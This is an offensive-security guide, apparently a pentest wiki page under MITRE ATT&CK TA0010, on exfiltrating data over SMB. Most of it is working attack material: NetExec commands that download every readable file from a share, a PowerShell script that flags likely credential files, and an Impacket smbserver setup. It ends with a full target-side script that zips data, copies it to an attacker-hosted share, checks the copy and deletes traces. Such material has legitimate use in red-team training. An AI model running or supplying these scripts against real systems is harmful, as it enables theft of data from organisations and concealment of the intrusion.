Exfiltration Over SMB
MITRE ATT&CK™ - Exfiltration - Tactic TA0010
Theory
SMB (Server Message Block) exfiltration refers to the unauthorized extraction or transfer of data from a compromised network or system using SMB protocols. Attackers can leverage SMB to transfer sensitive or valuable information from an organization's network to an external location.
Practice
Exfiltrate Share's Content
Tools like NetExec can be used to recursively download an SMB share's content. DOWNLOAD_FLAG=True makes the spider_plus module download every readable file (without it, the module only lists them), and MAX_FILE_SIZE sets the per-file size limit in bytes; the module's default is much smaller, so larger files are skipped unless it is raised.
netexec smb $IP -u $USERNAME -p $PASSWORD -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=999999
Whether or not files are downloaded, the module also writes a JSON report (named after the target, e.g. 10.10.10.111.json) listing every readable file in every share, keyed by share name and then by file path. jq gives a quick overview of which files are accessible per share:
cat 10.10.10.111.json | jq '. | map_values(keys)'
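Beyond listing file names, the report can be triaged for files worth pulling. The following is an added example, not code from the original page or from NetExec: it reads the spider_plus JSON (sample constructed inline with the share/path nesting the jq command above relies on; the per-file "size" field and its human-readable format are an assumption) and prints the entries whose extension is on a short watch list. It runs in PowerShell, which is also available as pwsh on a Linux attacking host; replace the sample with Get-Content -Raw 10.10.10.111.json for a real report.

```powershell
# Added example: triage a NetExec spider_plus JSON report.
# Assumptions (not from the page): share -> file path -> metadata nesting, with a
# human-readable "size" string per file. The sample below is constructed.
$sampleJson = @'
{
  "Users": {
    "Administrator/Desktop/passwords.xlsx": { "size": "13.89 KB" },
    "Public/readme.txt": { "size": "34 B" }
  },
  "IT": {
    "backups/web.config": { "size": "2.10 KB" },
    "installers/setup.exe": { "size": "48.00 MB" }
  }
}
'@

function Get-InterestingFiles {
    param(
        [Parameter(Mandatory)] [string] $Json,
        # Extensions that typically carry credentials or business data (assumed watch list).
        [string[]] $Extensions = @('.xlsx', '.docx', '.config', '.kdbx', '.txt')
    )
    $report = $Json | ConvertFrom-Json
    foreach ($share in $report.PSObject.Properties) {
        foreach ($file in $share.Value.PSObject.Properties) {
            $ext = [System.IO.Path]::GetExtension($file.Name)
            if ($Extensions -contains $ext) {
                [pscustomobject]@{
                    Share = $share.Name
                    Path  = $file.Name
                    Size  = $file.Value.size
                }
            }
        }
    }
}

# Usage: with the constructed sample this lists passwords.xlsx, readme.txt and web.config
# and leaves setup.exe out. For a real run: Get-Content -Raw 10.10.10.111.json | Get-InterestingFiles
Get-InterestingFiles -Json $sampleJson | Sort-Object Share, Path | Format-Table -AutoSize
```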
Exfiltrate Data
To exfiltrate data from the target, we can compress it and copy the archive to an SMB share hosted on our attacking host. Keep in mind that outbound SMB (TCP/445) is usually filtered at the network perimeter, so in practice this works inside the internal network or towards a pivot host under our control rather than directly to the Internet.
First, start an SMB server on the attacking host using smbserver.py from Impacket. -smb2support is needed because modern Windows hosts no longer speak SMB1, and the -user/-password pair matters because Windows refuses unauthenticated guest access to SMB shares by default (the AllowInsecureGuestAuth policy), so an open share would fail at the net use step.
smbserver.py -smb2support /local/share/path ShareName -user veresk -password psswd
On the target, compress the data (Compress-Archive is a PowerShell cmdlet)
Compress-Archive -Path /path/to/compress -DestinationPath exfi.zip
From the target, map the share to a drive letter with the credentials given to smbserver.py and copy the archive to it
# Mount the smb share
net use Z: \\ATTACKING_IP\ShareName psswd /USER:veresk
# Exfiltrate ZIP file
copy exfi.zip Z:\
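The whole target-side procedure, as an added example that is not part of the original page: it compresses a directory, maps the attacker's share with the credentials smbserver.py expects, copies the archive, checks the copy with a SHA256 comparison over the mapped drive, and finally removes the mapping and the local archive. The attacker IP (10.10.14.5), the share name, the veresk/psswd credentials and the source directory are assumed placeholders to adapt; smbserver.py must already be running as shown above.

```powershell
# Added example (not from the original page): exfiltration over SMB from a Windows target
# to an attacker-hosted impacket smbserver.py share, run in PowerShell on the target.
# Assumed values: attacker IP, share name, credentials and source directory.
$AttackerIp = '10.10.14.5'
$ShareName  = 'ShareName'
$User       = 'veresk'
$Password   = 'psswd'
$SourceDir  = 'C:\Users\Public\Documents'
$Archive    = Join-Path $env:TEMP 'exfi.zip'
$Drive      = 'Z'

# 1. Compress the target data. -Force overwrites a stale archive from a previous run.
Compress-Archive -Path $SourceDir -DestinationPath $Archive -Force

# 2. Map the attacker's share with the credentials smbserver.py was started with.
#    Windows refuses unauthenticated (guest) SMB access by default, which is why the
#    server is run with -user/-password instead of as an open share.
net use "${Drive}:" "\\$AttackerIp\$ShareName" $Password /USER:$User | Out-Null
if ($LASTEXITCODE -ne 0) {
    throw "net use failed: is smbserver.py running with -smb2support and is TCP/445 reachable?"
}

try {
    # 3. Copy the archive and verify the transfer by hashing both copies.
    Copy-Item -Path $Archive -Destination "${Drive}:\"
    $local  = (Get-FileHash -Path $Archive -Algorithm SHA256).Hash
    $remote = (Get-FileHash -Path "${Drive}:\exfi.zip" -Algorithm SHA256).Hash
    if ($local -ne $remote) { throw "hash mismatch after copy: $local != $remote" }
    Write-Host "exfiltrated $Archive (SHA256 $local)"
}
finally {
    # 4. Clean up: drop the mapping and the local archive to leave less behind on the target.
    net use "${Drive}:" /delete /y | Out-Null
    Remove-Item -Path $Archive -Force -ErrorAction SilentlyContinue
}
```

The hash comparison matters because an interrupted copy over a flaky link produces a truncated zip that only fails when opened later; checking it while the share is still mapped lets the copy be retried immediately.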